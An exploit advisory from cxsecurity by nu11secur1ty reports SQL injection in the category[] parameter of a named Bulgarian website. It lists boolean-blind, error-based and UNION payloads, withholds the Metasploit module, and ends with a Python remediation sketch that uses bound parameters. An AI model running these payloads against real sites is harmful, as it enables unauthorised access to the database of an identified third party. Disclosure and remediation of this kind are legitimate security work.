greenlife-Copyright©2025-Multiple-SQLi

2025.10.21
Credit: nu11secur1ty
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Titles: greenlife-Copyright©2025-Multiple-SQLi - Metasploit module - soon
# Author: nu11secur1ty
# Date: 10/06/2025
# Vendor: https://www.greenlife.bg/bg
# Software: https://www.greenlife.bg/bg
# Reference: https://portswigger.net/web-security/sql-injection

## Description:
The category%5B%5D parameter appears to be vulnerable to SQL injection attacks. The payloads ` and 7609=07609` and ` and 2154=2162` were each submitted in the category%5B%5D parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way. Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Additionally, the payload `(select*from(select(sleep(20)))a)` was submitted in the category%5B%5D parameter. The application took 20206 milliseconds to respond to the request, compared with 1413 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

STATUS: HIGH-CRITICAL Vulnerability

[+]Payload:

- SQLi:

```SQLi
---
Parameter: category[] (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: category[]=1 and 2154=2162&category[]=3&category[]=5) AND 6069=6069 AND (9510=9510&city[]=1&city[]=6&city[]=7&city[]=8&city[]=10

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: category[]=1 and 2154=2162&category[]=3&category[]=5) OR (SELECT 6421 FROM(SELECT COUNT(*),CONCAT(0x717a626b71,(SELECT (ELT(6421=6421,1))),0x7176717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (5033=5033&city[]=1&city[]=6&city[]=7&city[]=8&city[]=10

    Type: UNION query
    Title: MySQL UNION query (UCHAR) - 16 columns
    Payload: category[]=1 and 2154=2162&category[]=3&category[]=5) UNION ALL SELECT 'UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR',CONCAT(0x717a626b71,0x765652555971466244766b754c4e6263616e686c4877515a467876567069714c4e43504441625a4b,0x7176717a71),'UCHAR','UCHAR','UCHAR'#&city[]=1&city[]=6&city[]=7&city[]=8&city[]=10
---
```

[+]MSF exploit:

```rb
soon... but will not be published
```

[+]Reproduce:
It is not present for security reasons!

# Time spent: 00:15:00

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
home page: https://www.asc3t1c-nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <https://nu11secur1ty.blogspot.com/>
nu11secur1ty <https://nu11secur1ty.com/>
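
A remediation sketch for the pattern reported above, added here as an example and not taken from the advisory, the vendor or the affected site: array parameters such as `category[]` and `city[]` are validated as integers and bound as placeholders in an `IN (...)` list, so their values never become SQL text. The table, column and function names are assumptions, the use of an `IN (...)` filter is inferred from the `5) AND ... AND (` shape of the reported payloads, and SQLite stands in for the MySQL backend named in the scan output so the code runs offline.

```python
import sqlite3
from urllib.parse import parse_qs

MAX_IDS = 50  # assumed upper bound on filter values per request


def parse_id_list(query: str, name: str) -> list[int]:
    """Return the values of an array parameter such as category[] as ints.

    Raises ValueError on anything that is not a short run of ASCII digits.
    """
    raw = parse_qs(query, keep_blank_values=True).get(name, [])
    if len(raw) > MAX_IDS:
        raise ValueError(f"too many values for {name}")
    ids = []
    for value in raw:
        if not (value.isascii() and value.isdigit() and len(value) <= 9):
            raise ValueError(f"non-numeric value for {name}: {value!r}")
        ids.append(int(value))
    return ids


def find_items(db: sqlite3.Connection, query: str) -> list[str]:
    """Filter items by category and city using bound parameters only."""
    categories = parse_id_list(query, "category[]")
    cities = parse_id_list(query, "city[]")
    sql, args = "SELECT name FROM items WHERE 1=1", []
    # Column names come from this fixed tuple, never from the request.
    for column, ids in (("category_id", categories), ("city_id", cities)):
        if ids:
            # One "?" per value; the values never become part of the SQL text.
            sql += f" AND {column} IN ({','.join('?' * len(ids))})"
            args += ids
    return [row[0] for row in db.execute(sql + " ORDER BY name", args)]


def demo_db() -> sqlite3.Connection:
    """Constructed sample data, not taken from the affected site."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE items (name TEXT, category_id INT, city_id INT)")
    db.executemany("INSERT INTO items VALUES (?, ?, ?)",
                   [("apples", 1, 1), ("bread", 3, 6), ("cheese", 5, 9)])
    return db
```

Rejecting the request outright on a non-numeric value also gives the application a clean event to log and alert on, which helps separate scanner traffic from normal filter use.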


Copyright 2025, cxsecurity.com

 
